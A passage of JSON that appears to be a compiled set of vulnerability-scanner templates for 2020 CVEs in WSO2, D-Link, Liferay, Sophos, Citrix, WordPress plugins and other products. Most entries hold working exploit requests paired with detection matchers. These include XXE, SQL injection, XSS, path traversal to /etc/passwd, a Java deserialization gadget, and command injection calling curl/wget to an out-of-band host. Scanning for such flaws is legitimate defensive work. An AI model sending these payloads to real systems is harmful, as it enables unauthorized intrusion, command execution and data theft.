Center"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24589","info":{"name":"WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npayload=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+\"http%3a//{{interactsh-url}}\">%25xxe%3b]>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Failed to install the generic artifact type"]}]}]},{"id":"CVE-2020-8512","info":{"name":"IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","<strong>IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35847","info":{"name":"Agentejo Cockpit <0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"nonexistent_function\"\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_1","regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_1","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"(error404)([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_2","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]}]}]},{"id":"CVE-2020-3580","info":{"name":"Cisco ASA/FTD Software - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/{{randstr}}/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25078","info":{"name":"D-Link DCS-2530L/DCS-2670L  - Administrator Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/getuser?index=0"],"matchers-condition":"and","matchers":[{"type":"word","words":["name=","pass="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6207","info":{"name":"SAP Solution Manager 7.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /EemAdminService/EemAdmin HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:adm=\"http://sap.com/smd/eem/admin/\"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":Envelope",":Body",":getAllAgentInfoResponse"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16846","info":{"name":"SaltStack <=3002 - Shell Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/run"],"body":"token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"CherryPy\\/([0-9.]+)\", header) || regex(\"CherryPy ([0-9.]+)\", body)"]},{"type":"word","part":"body","words":["An unexpected error occurred"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-24912","info":{"name":"QCube Cross-Site-Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/assets/_core/php/profile.php","{{BaseURL}}/assets/php/profile.php","{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"],"body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('xss')</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]}]}]},{"id":"CVE-2020-13937","info":{"name":"Apache Kylin - Exposed Configuration File","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/kylin/api/admin/config"],"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["config","kylin.metadata.url"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5412","info":{"name":"Spring Cloud Netflix - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["Jelly"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36112","info":{"name":"CSE Bookstore 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["get book price failed! You have an error in your SQL syntax","Can't retrieve data You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2020-19515","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain) />","qdPM"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27986","info":{"name":"SonarQube - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/settings/values"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email.smtp_host.secured","email.smtp_password.secured","email.smtp_port.secured","email.smtp_username.secured"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9344","info":{"name":"Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test","{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","jira","subversion"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25506","info":{"name":"D-Link DNS-320 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/system_mgr.cgi? HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nC1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`\n","POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-8163","info":{"name":"Ruby on Rails <5.0.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7961","info":{"name":"Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/jsonws/invoke HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData\ncmd2: {{command}}\n\ncmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D\n"],"payloads":{"command":["systeminfo","lsb_release -a"]},"matchers-condition":"and","matchers":[{"type":"regex","regex":["OS Name:.*Microsoft Windows","Distributor ID:"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Microsoft Windows (.*)","Distributor ID: (.*)"],"part":"body"}]}]},{"id":"CVE-2020-11530","info":{"name":"WordPress Chop Slider 3 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/javascript\")","contains(body, \"$(document).ready(function()\")"],"condition":"and"}]}]},{"id":"CVE-2020-23015","info":{"name":"OPNsense <=20.1.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-8193","info":{"name":"Citrix  - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: xpyZxwy6\nX-NITRO-PASS: xWXHUJ56\n\n<appfwprofile><login></login></appfwprofile>\n","GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/neo HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/stc HTTP/1.1\nHost: {{Hostname}}\n","POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<appfwprofile><login></login></appfwprofile>\n","POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<clipermission></clipermission>\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}],"extractors":[{"type":"regex","name":"randkey","regex":["(?m)[0-9]{3,10}\\.[0-9]+"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-15050","info":{"name":"Suprema BioStar <2.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2020-29227","info":{"name":"Car Rental Management System 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=/etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10148","info":{"name":"SolarWinds Orion API - Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web.config.i18n.ashx?l={{string}}&v={{string}}","{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SolarWinds.Orion.Core.","Connection String"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25223","info":{"name":"Sophos UTM Preauth - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /var HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, text/html, application/xml, text/xml, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nX-Prototype-Version: 1.5.1.1\nContent-Type: application/json; charset=UTF-8\nOrigin: {{BaseURL}}\nConnection: close\nReferer: {{BaseURL}}\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"objs\": [{\"FID\": \"init\"}], \"SID\": \"|wget http://{{interactsh-url}}|\", \"browser\": \"gecko_linux\", \"backend_version\": -1, \"loc\": \"\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1629210675639_0.5000855117488202\", \"current_uuid\": \"\", \"ipv6\": true}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-26948","info":{"name":"Emby Server Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name or service not known"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-28871","info":{"name":"Monitorr 1.7.6m - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: text/plain, */*; q=0.01\nConnection: close\nAccept-Language: en-US,en;q=0.5\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745\nOrigin: http://{{Hostname}}\nReferer: http://{{Hostname}}\n\n-----------------------------31046105003900160576454225745\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.php\"\nContent-Type: image/gif\n\nGIF89a213213123<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------31046105003900160576454225745--\n","GET /assets/data/usrimg/{{tolower(\"{{randstr}}.php\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7107","info":{"name":"WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ultimate FAQ","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'</script><svg/onload=alert(document.cookie)>","var Display_FAQ_ID ="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19282","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27866","info":{"name":"NETGEAR - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Debug Enable!"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5284","info":{"name":"Next.js <9.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/static/../server/pages-manifest.json"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\\{\"/_app\":\".*?_app\\.js\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8772","info":{"name":"WordPress InfiniteWP <1.9.4.5 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Language: en-US,en;q=0.9\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\n_IWP_JSON_PREFIX_{{base64(\"{\\\"iwp_action\\\":\\\"add_site\\\",\\\"params\\\":{\\\"username\\\":\\\"{{username}}\\\"}}\")}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wordpress_logged_in"]},{"type":"word","part":"body","words":["<IWPHEADER>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2020-35580","info":{"name":"SearchBlox <9.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-13851","info":{"name":"Artica Pandora FMS 7.44 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["text/html","PHPSESSID="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35846","info":{"name":"Agentejo Cockpit < 0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/check"],"body":"{\n  \"auth\": {\n    \"user\": {\n      \"$eq\": \"admin\"\n    },\n    \"password\": [\n      0\n    ]\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password_verify() expects parameter"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26876","info":{"name":"WordPress WP Courses Plugin Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/lesson/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["rest_post_invalid_id","\"(guid|title|content|excerpt)\":{\"rendered\":"],"condition":"or"},{"type":"status","status":[200,404],"condition":"or"}]}]},{"id":"CVE-2020-13483","info":{"name":"Bitrix24 <=20.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href=\"/*\">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>","{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"/*\">*/)});function __MobileAppList(){alert(1)}//","function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13158","info":{"name":"Artica Proxy Community Edition <4.30.000000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6950","info":{"name":"Eclipse Mojarra - Local File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/javax.faces.resources/web.xml.jsf?loc=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/web.xml.jsf?con=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?loc=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?con=/../../WEB-INF"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/xml\")","contains_all(body, \"<web-app\", \"<servlet>\") || contains_all(body, \"<faces-config\", \"</faces-config>\")"],"condition":"and"}]}]},{"id":"CVE-2020-8654","info":{"name":"EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/css/eonweb.css"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.4', '>= 5.1')"]},{"type":"word","part":"body","words":["EyesOfNetwork"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["# VERSION : ([0-9.]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-11034","info":{"name":"GLPI <9.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=/\\/interact.sh/","{{BaseURL}}/index.php?redirect=//interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-17496","info":{"name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 